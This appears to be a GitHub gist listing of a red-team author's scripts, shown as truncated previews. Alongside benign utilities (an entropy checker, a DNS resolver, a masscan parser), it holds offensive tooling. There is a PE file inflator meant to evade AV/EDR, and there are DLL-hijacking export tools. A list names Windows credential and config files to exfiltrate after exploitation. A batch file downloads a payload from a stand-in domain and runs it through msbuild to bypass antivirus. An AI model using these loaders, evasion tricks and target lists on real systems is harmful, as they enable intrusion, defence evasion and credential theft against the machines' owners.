Will Summerhill wsummerhill
wsummerhill
/ Shannon-Entropy.py
Last active
August 31, 2024 07:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, os | |
| import argparse | |
| import math | |
| import pefile | |
| ''' | |
| Shannon-Entropy.py | |
| Determine Shannon Entropy of any file - value output between 0 (ordered) and 8 (fully random) | |
| Optinally add `-pe` argument to parse file headers of PE file and determine entropy for each header | |
| ''' |
wsummerhill
/ inflate.py
Created
October 27, 2023 20:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Original source: https://github.com/njcve/inflate.py/tree/main | |
| # File inflator to incease size of payload to help bypass AV/EDR | |
| import sys | |
| import struct | |
| import argparse | |
| import shutil # file copy | |
| def main(args=sys.argv[1:]): | |
| parser = argparse.ArgumentParser(description='PE file inflator - Inflates file with null bytes at the end of file') | |
| parser.add_argument("-file", "-f", help="Target PE file to inflate (EXE, DLL, etc.)") |
wsummerhill
/ Find-DLL-Exports_DLL-Proxying.py
Last active
January 9, 2023 22:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Create DLL exports in C++ format for DLL proxying to legitimate DLL on disk | |
| Usage: | |
| python3 Find-DLL-Exports_DLL-Proxying.py "C:\path\to\original\location\DLL.dll" | |
| Example: | |
| python3 Find-DLL-Exports_DLL-Proxying.py "C:\Windows\System32\wtsapi32.dll" | |
| Output sample -> Put at the top of your C++ code under the imports to DLL proxy traffic to the target DLL provided from the input | |
| // Export DLL functions | |
| #pragma once |
wsummerhill
/ get-IPs-by-hostname.py
Created
November 16, 2022 17:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Quick Python script to loop through hostnames from file and resolve their IPs | |
| import socket, sys | |
| hostsFile = sys.argv[1] | |
| with open(hostsFile) as file: | |
| for line in file: | |
| try: | |
| host = line.strip() | |
| ip = socket.gethostbyname(host) |
wsummerhill
/ Get-Exports.ps1
Last active
October 12, 2022 21:10
— forked from thesubtlety/Get-Exports.ps1
DLL Hijack with exports
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All credit goes to @thesubtlety - https://gist.github.com/thesubtlety/a79fb95bd65e9ca8e029058ffc887eff | |
| # Below is a slightly modified version of their original script | |
| function Get-DLL-Exports { | |
| <# | |
| .SYNOPSIS | |
| Get-Exports, fetches DLL exports and optionally provides | |
| C++ wrapper output (idential to ExportsToC++ but without | |
| needing VS and a compiled binary). To do this it reads DLL | |
| bytes into memory and then parses them (no LoadLibraryEx). |
wsummerhill
/ .post_exploitation_files_windows
Last active
November 29, 2023 22:54
Windows files to exfiltration during post-exploitation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
| %APPDATA%\FileZilla\sitemanager.xml | |
| C:\Program Files\FileZilla Server\FileZilla Server.xml | |
| c:\WINDOWS\Repair\SAM | |
| c:\WINDOWS\php.ini | |
| c:\WINNT\php.ini | |
| c:\Program Files\Apache Group\Apache\conf\httpd.conf | |
| c:\Program Files\Apache Group\Apache2\conf\httpd.conf | |
| c:\Program Files\Apache Group\Apache\logs\access.log | |
| c:\Program Files\Apache Group\Apache\logs\error.log |
wsummerhill
/ masscan-parser.py
Created
February 16, 2022 19:05
Quick masscan parser to print output in format HOST:IP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import sys | |
| from xml.dom import minidom | |
| file = sys.argv[1] | |
| xml = minidom.parse(file) | |
| ips = xml.getElementsByTagName('address') | |
| ports = xml.getElementsByTagName('port') |
wsummerhill
/ test.bat
Last active
February 27, 2020 16:08
Excel SLK file with remote .bat script for payload execution and AV bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @ECHO OFF | |
| powershell -ep 1 -c (new-object Net.WebClient).DownloadFile(\"https://YourDomain.org/payload.xml\",\"$env:TMP\Debug.tmp\") | |
| %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe %temp%\Debug.tmp |